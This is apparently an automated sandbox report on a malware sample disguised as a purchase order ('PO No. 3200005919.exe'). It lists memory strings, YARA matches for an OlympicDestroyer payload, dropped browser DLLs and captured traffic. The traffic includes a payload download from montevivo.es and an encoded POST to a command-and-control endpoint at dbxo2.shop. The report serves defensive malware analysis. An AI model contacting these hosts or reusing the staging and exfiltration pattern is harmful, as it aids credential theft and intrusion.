                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
                    Source: 382858288932396262502121.tmp.5.drString found in binary or memory: https://login.live.com/
                    Source: PO No. 3200005919.exe, 00000005.00000003.7217109993.0000000001803000.00000004.00000020.00020000.00000000.sdmp, 382858288932396262502121.tmp.5.drString found in binary or memory: https://login.live.com//
                    Source: 382858288932396262502121.tmp.5.drString found in binary or memory: https://login.live.com/https://login.live.com/
                    Source: PO No. 3200005919.exe, 00000005.00000003.7217109993.0000000001803000.00000004.00000020.00020000.00000000.sdmp, 382858288932396262502121.tmp.5.drString found in binary or memory: https://login.live.com/v104
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.drString found in binary or memory: https://mozilla.org0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: unknownHTTP traffic detected: POST /dbx2/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo2.shopContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 10 8b 30 64 ef 26 66 97 26 66 9d 42 70 9d 37 70 9d 36 70 9c 47 70 9d 35 70 9d 37 70 9d 33 13 ec 26 66 9a 26 66 9e 26 66 98 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0d&f&fBp7p6pGp5p7p3&f&f&f
                    Source: unknownDNS traffic detected: queries for: montevivo.es
                    Source: global trafficHTTP traffic detected: GET /lPkFJXszrxOMoP0.hhp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: montevivo.esCache-Control: no-cache
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

                    System Summary

                    barindex
                    Source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: PO No. 3200005919.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Windows\leprousness.lnkJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00404D90
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00406ABA
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412040B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04128C0B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126C23
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412045A
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126C43
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04124C96
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412C48A
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041274A3
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041204E0
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126D15
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412053A
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120593
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041205DE
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041275C9
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120625
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126E66
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04141EE6
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412071B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04144734
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0413FF6B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120792
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126F9D
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041207D5
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041427C4
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412081F
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120001
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120006
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04122031
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120885
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041270D8
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041200CA
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041208F6
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041200E1
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041270E1
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04128954
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120158
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412817D
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120993
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041281A4
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041209D9
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04128A17
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120A2B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120A7A
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04127AB1
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0413FAB7
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04128ADD
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041202C0
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041432EB
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412037C
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120395
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04124BBC
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04128BBD
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126BD8
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 5_2_0168489C
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04145617 NtResumeThread,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041443B0 NtProtectVirtualMemory,
                    Source: api-ms-win-core-synch-l1-2-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-string-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-debug-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-heap-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-handle-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-memory-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-sysinfo-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-utility-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-environment-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-filesystem-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-heap-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-runtime-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-console-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-string-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l2-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-localization-l1-2-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-locale-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-profile-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l1-2-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-process-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-libraryloader-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-private-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-datetime-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-1.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-namedpipe-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-time-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-convert-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-math-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-util-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-multibyte-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-stdio-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processenvironment-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-interlocked-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-conio-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-timezone-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameqipcap.dll8 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWMIMethod.dllL vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameqipcap.dll8 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192792717.000000001E604000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7161475490.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7166478515.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197956244.000000001E6B4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7164106750.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196659326.000000001E664000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7155669494.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7280858464.000000001E270000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7161350303.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7158930983.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
